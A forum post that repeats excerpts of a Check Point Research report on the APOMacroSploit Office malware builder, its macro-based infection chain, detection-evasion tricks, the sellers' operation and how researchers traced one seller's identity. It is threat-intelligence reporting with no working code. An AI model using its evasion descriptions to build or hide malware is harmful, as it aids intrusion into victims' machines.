- Jul 27, 2015
- 5,458
Quote: " At the end of November, Check Point Research detected a new Office malware builder called APOMacroSploit, which was implicated in multiple malicious emails to more than 80 customers worldwide. In our investigation, we found that this tool includes features to evade detection by Windows Defender and is updated daily to ensure low detection rates. In this article, we reveal the threat actors’ malicious intentions and disclose the real identity of one attacker. We reported this information to the relevant law enforcement authorities.
The malware infection begins when the dynamic content of the attached XLS document is enabled, and an XLM macro automatically starts downloading a Windows system command script. Based on the number of customers and the lowest option price for this product, we estimate that the two main threat actors made at least $5000 in 1.5 months, just by selling the APOMacroSploit product. We followed multiple cases of attacks related to this tool, which we discuss here, and we describe a popular RAT used in this campaign to control the victim’s machine remotely and steal information. Approximately 40 different hackers are involved in this campaign, and utilize 100 different email senders in the attacks. Overall, our telemetry reports attacks occurred in more than 30 different countries.
The initial malicious document our customer received was an XLS file containing an obfuscated XLM macro called Macro 4.0. The macro is triggered automatically when the victim opens the document, and downloads a BAT file from cutt[.]ly. The execution of the command “attrib” enables the BAT script to hide in the victim’s machine. We assume the reordering of the PowerShell instructions via the Start-Sleep command (visible after deobfuscation) is seen by the attacker as another static evasion. At this stage of the attack, the attackers made a key mistake. The cutt[.]ly domain directly redirects to a download server and does not perform the request on the back end. "
Quote : " Nitrix and Apocaliptique assist buyers with how to use the tool. Many of the customer nicknames visible on the download server were also found on the channel. For each customer, Apocaliptique and Nitrix created a BAT file to use in the attack (see the procedure description below): This screenshot shows that not only did these hackers sell their attack tools, but they also participated in building and hosting the malware.
After digging in Nitrix Twitter account, we finally obtained his identity: he revealed his actual name when he posted a picture of a ticket he bought for a concert in December 2014. "
Full source :
research.checkpoint.com
The malware infection begins when the dynamic content of the attached XLS document is enabled, and an XLM macro automatically starts downloading a Windows system command script. Based on the number of customers and the lowest option price for this product, we estimate that the two main threat actors made at least $5000 in 1.5 months, just by selling the APOMacroSploit product. We followed multiple cases of attacks related to this tool, which we discuss here, and we describe a popular RAT used in this campaign to control the victim’s machine remotely and steal information. Approximately 40 different hackers are involved in this campaign, and utilize 100 different email senders in the attacks. Overall, our telemetry reports attacks occurred in more than 30 different countries.
The initial malicious document our customer received was an XLS file containing an obfuscated XLM macro called Macro 4.0. The macro is triggered automatically when the victim opens the document, and downloads a BAT file from cutt[.]ly. The execution of the command “attrib” enables the BAT script to hide in the victim’s machine. We assume the reordering of the PowerShell instructions via the Start-Sleep command (visible after deobfuscation) is seen by the attacker as another static evasion. At this stage of the attack, the attackers made a key mistake. The cutt[.]ly domain directly redirects to a download server and does not perform the request on the back end. "
Quote : " Nitrix and Apocaliptique assist buyers with how to use the tool. Many of the customer nicknames visible on the download server were also found on the channel. For each customer, Apocaliptique and Nitrix created a BAT file to use in the attack (see the procedure description below): This screenshot shows that not only did these hackers sell their attack tools, but they also participated in building and hosting the malware.
After digging in Nitrix Twitter account, we finally obtained his identity: he revealed his actual name when he posted a picture of a ticket he bought for a concert in December 2014. "
Full source :
ApoMacroSploit : Apocalyptical FUD race - Check Point Research
1.1 Introduction At the end of November, Check Point Research detected a new Office malware builder called APOMacroSploit, which was implicated in multiple malicious emails to more than 80 customers worldwide. In our investigation, we found that this tool includes features to evade...
research.checkpoint.com
